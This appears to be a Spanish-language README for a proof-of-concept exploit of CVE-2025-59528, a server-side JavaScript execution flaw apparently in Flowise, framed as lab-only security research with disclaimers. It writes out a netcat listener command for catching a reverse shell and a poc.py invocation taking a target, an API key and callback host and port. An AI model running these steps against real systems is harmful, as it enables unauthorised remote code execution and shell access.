
The poc of CVE-2025-59528
Prueba de concepto para investigar CVE-2025-59528 en un entorno de laboratorio aislado.
[!WARNING] DESCARGO DE RESPONSABILIDAD
Este proyecto está destinado estrictamente a fines educativos, investigación de seguridad y pruebas de sistemas que usted posee o para los que cuenta con autorización explícita para realizar pruebas.
No utilice este PoC contra servidores de terceros, servicios públicos o infraestructura sin el permiso del propietario.
El autor no se hace responsable de daños, pérdida de datos, interrupción del servicio o consecuencias legales derivadas del uso indebido de este proyecto.
Este PoC demuestra el impacto potencial de CVE-2025-59528, una vulnerabilidad que involucra el procesamiento de mcpServerConfig controlado por el usuario en Flowise.
Bajo ciertas condiciones, la vulnerabilidad puede permitir a un atacante ejecutar código JavaScript arbitrario en el contexto del lado del servidor.
Verifique siempre la versión exacta de la instalación de destino antes de realizar las pruebas.
requestsInstale la dependencia de Python:
pip install requests
Ejecute netcat para obtener una shell:
nc -lvnp <YOUR_PORT>
Ejecute el PoC con:
python3 poc.py \
-t http://TARGET:PORT \
-o api_key \
-i CALLBACK_IP \
-p CALLBACK_PORT
Las pruebas deben realizarse dentro de una red virtual o de laboratorio aislada.
┌──────────────────┐
│ PoC Machine │
│ │
│ Python PoC │
└────────┬─────────┘
│
│ Isolated Network
│
┌────────▼─────────┐
│ Flowise 3.0.5 │
│ Test Instance │
└──────────────────┘
No exponga una instancia de Flowise intencionalmente vulnerable directamente a Internet público.
Si está ejecutando una versión afectada de Flowise:
Al usar este proyecto, usted reconoce que es el único responsable de cumplir con todas las leyes y regulaciones aplicables.
Use este PoC únicamente contra sistemas que le pertenezcan o sistemas para los cuales tenga autorización explícita para realizar pruebas de seguridad.
| Argument | Description |
|---|
-t, --target | URL de la instancia de prueba de Flowise |
-o, --api_key | Clave de API |
-i, --ip | Dirección IP de la máquina de pruebas |
-p, --port | Puerto utilizado por el entorno de pruebas |